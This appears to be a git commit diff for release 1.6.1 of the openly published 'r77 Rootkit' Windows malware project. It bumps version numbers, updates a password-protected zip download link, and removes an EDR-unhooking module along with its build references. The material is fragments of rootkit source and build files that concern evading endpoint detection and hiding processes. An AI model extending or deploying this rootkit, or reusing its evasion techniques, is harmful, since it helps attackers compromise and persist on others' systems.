1.6.1

bytecode77 · bytecode77 · commit cd416b02644d · 2025-01-09T21:06:26.000+01:00
diff --git a/$Docs/Documentation.docx b/$Docs/Documentation.docx
diff --git a/Global/GlobalAssemblyInfo.cs b/Global/GlobalAssemblyInfo.cs
@@ -1,5 +1,5 @@
 ﻿using System.Reflection;
 
-[assembly: AssemblyVersion("1.6.0")]
-[assembly: AssemblyFileVersion("1.6.0")]
+[assembly: AssemblyVersion("1.6.1")]
+[assembly: AssemblyFileVersion("1.6.1")]
 [assembly: AssemblyCopyright("© bytecode77, 2025.")]
diff --git a/README.md b/README.md
@@ -82,7 +82,7 @@ Please read the [technical documentation](https://docs.bytecode77.com/r77-rootki
 
 ## Downloads
 
-[![](https://bytecode77.com/public/fileicons/zip.png) r77 Rootkit 1.6.0.zip](https://downloads.bytecode77.com/r77Rootkit%201.6.0.zip)
+[![](https://bytecode77.com/public/fileicons/zip.png) r77 Rootkit 1.6.1.zip](https://downloads.bytecode77.com/r77Rootkit%201.6.1.zip)
 (**ZIP Password:** bytecode77)<br />
 [![](https://bytecode77.com/public/fileicons/pdf.png) Technical Documentation](https://docs.bytecode77.com/r77-rootkit/Technical%20Documentation.pdf)
 
diff --git a/r77-x64/r77-x64.vcxproj b/r77-x64/r77-x64.vcxproj
@@ -22,13 +22,10 @@
     <CharacterSet>Unicode</CharacterSet>
   </PropertyGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
-  </ImportGroup>
+  <ImportGroup Label="ExtensionSettings" />
   <ImportGroup Label="Shared">
     <Import Project="..\r77api\r77api.vcxitems" Label="Shared" />
     <Import Project="..\r77\r77.vcxitems" Label="Shared" />
-    <Import Project="..\Unhook\Unhook.vcxitems" Label="Shared" />
     <Import Project="..\ReflectiveDllMain\ReflectiveDllMain.vcxitems" Label="Shared" />
   </ImportGroup>
   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
@@ -69,7 +66,5 @@ echo F|xcopy /I /Y "$(TargetPath)" "$(SolutionDir)Stager\Resources\$(TargetName)
     </PostBuildEvent>
   </ItemDefinitionGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
-  </ImportGroup>
+  <ImportGroup Label="ExtensionTargets" />
 </Project>
diff --git a/r77-x86/r77-x86.vcxproj b/r77-x86/r77-x86.vcxproj
@@ -22,13 +22,10 @@
     <CharacterSet>Unicode</CharacterSet>
   </PropertyGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
-  </ImportGroup>
+  <ImportGroup Label="ExtensionSettings" />
   <ImportGroup Label="Shared">
     <Import Project="..\r77api\r77api.vcxitems" Label="Shared" />
     <Import Project="..\r77\r77.vcxitems" Label="Shared" />
-    <Import Project="..\Unhook\Unhook.vcxitems" Label="Shared" />
     <Import Project="..\ReflectiveDllMain\ReflectiveDllMain.vcxitems" Label="Shared" />
   </ImportGroup>
   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
@@ -69,7 +66,5 @@ echo F|xcopy /I /Y "$(TargetPath)" "$(SolutionDir)Stager\Resources\$(TargetName)
     </PostBuildEvent>
   </ItemDefinitionGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
-  </ImportGroup>
+  <ImportGroup Label="ExtensionTargets" />
 </Project>
diff --git a/r77.sln b/r77.sln
@@ -183,11 +183,9 @@ Global
 		r77api\r77api.vcxitems*{06af1d64-f2fc-4767-8794-7313c7bb0a40}*SharedItemsImports = 4
 		r77\r77.vcxitems*{06af1d64-f2fc-4767-8794-7313c7bb0a40}*SharedItemsImports = 4
 		ReflectiveDllMain\ReflectiveDllMain.vcxitems*{06af1d64-f2fc-4767-8794-7313c7bb0a40}*SharedItemsImports = 4
-		Unhook\Unhook.vcxitems*{06af1d64-f2fc-4767-8794-7313c7bb0a40}*SharedItemsImports = 4
 		r77api\r77api.vcxitems*{1ba54a13-b390-47b3-9628-b58a2bba193b}*SharedItemsImports = 4
 		r77\r77.vcxitems*{1ba54a13-b390-47b3-9628-b58a2bba193b}*SharedItemsImports = 4
 		ReflectiveDllMain\ReflectiveDllMain.vcxitems*{1ba54a13-b390-47b3-9628-b58a2bba193b}*SharedItemsImports = 4
-		Unhook\Unhook.vcxitems*{1ba54a13-b390-47b3-9628-b58a2bba193b}*SharedItemsImports = 4
 		Helper\Helper.vcxitems*{2d6fdd44-39b1-4ff8-8ae0-60a6b0979f5f}*SharedItemsImports = 4
 		r77api\r77api.vcxitems*{2d6fdd44-39b1-4ff8-8ae0-60a6b0979f5f}*SharedItemsImports = 4
 		Service\Service.vcxitems*{46e171d4-1811-48be-8867-a63c28761d28}*SharedItemsImports = 9
diff --git a/r77/Rootkit.c b/r77/Rootkit.c
@@ -3,16 +3,12 @@
 #include "Config.h"
 #include "r77def.h"
 #include "r77header.h"
-#include "Unhook.h"
 #include <Shlwapi.h>
 
 static BOOL RootkitInitialized;
 
 BOOL InitializeRootkit()
 {
-	// Unhook DLL's that are monitored by EDR.
-	Unhook();
-
 	// If the process starts with $77, do not load r77.
 	WCHAR executablePath[MAX_PATH + 1];
 	if (FAILED(GetModuleFileNameW(NULL, executablePath, MAX_PATH))) return FALSE;
